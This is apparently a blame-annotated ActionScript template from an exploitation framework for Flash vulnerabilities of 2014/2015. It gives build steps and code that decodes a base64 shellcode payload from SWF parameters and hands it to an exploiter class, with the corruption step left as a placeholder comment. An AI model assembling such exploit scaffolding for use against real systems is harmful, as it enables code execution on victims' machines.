2015-06-25 18:52:57 +00:00
|
|
|
/*
|
|
|
|
|
Code to assist the creation of exploits for the trend of Flash vulnerabilities used in the wild along 2014/2015.
|
|
|
|
|
|
|
|
|
|
It uses some ideas and code included on @hdarwin89 proof of concepts.
|
|
|
|
|
|
|
|
|
|
* How to build:
|
|
|
|
|
1. Download the AIRSDK, and use its compiler.
|
|
|
|
|
2. Download the Flex SDK (4.6)
|
|
|
|
|
3. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
|
|
|
|
|
(all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
|
|
|
|
|
4. Build with: mxmlc -o msf.swf Exploit.as
|
|
|
|
|
|
|
|
|
|
*/
|
|
|
|
|
|
|
|
|
|
package
|
|
|
|
|
{
|
|
|
|
|
import flash.display.Sprite
|
|
|
|
|
import flash.display.LoaderInfo
|
|
|
|
|
import mx.utils.Base64Decoder
|
|
|
|
|
import flash.utils.ByteArray
|
|
|
|
|
|
|
|
|
|
public class Exploit extends Sprite
|
|
|
|
|
{
|
|
|
|
|
private var uv:Vector.<uint>
|
|
|
|
|
private var b64:Base64Decoder = new Base64Decoder()
|
|
|
|
|
private var payload:ByteArray
|
|
|
|
|
private var platform:String
|
|
|
|
|
private var exploiter:Exploiter
|
|
|
|
|
|
|
|
|
|
public function Exploit()
|
|
|
|
|
{
|
|
|
|
|
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
|
|
|
|
|
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
|
|
|
|
var pattern:RegExp = / /g;
|
|
|
|
|
b64_payload = b64_payload.replace(pattern, "+")
|
|
|
|
|
b64.decode(b64_payload)
|
|
|
|
|
payload = b64.toByteArray()
|
|
|
|
|
|
|
|
|
|
/*
|
|
|
|
|
The exploit code here. The goal is to corrupt the uv vector length with 0x3fffffff or bigger.
|
|
|
|
|
*/
|
|
|
|
|
|
2015-07-15 23:32:45 +00:00
|
|
|
exploiter = new Exploiter(this, platform, payload, uv, 0x13e)
|
2015-06-25 18:52:57 +00:00
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
}
|
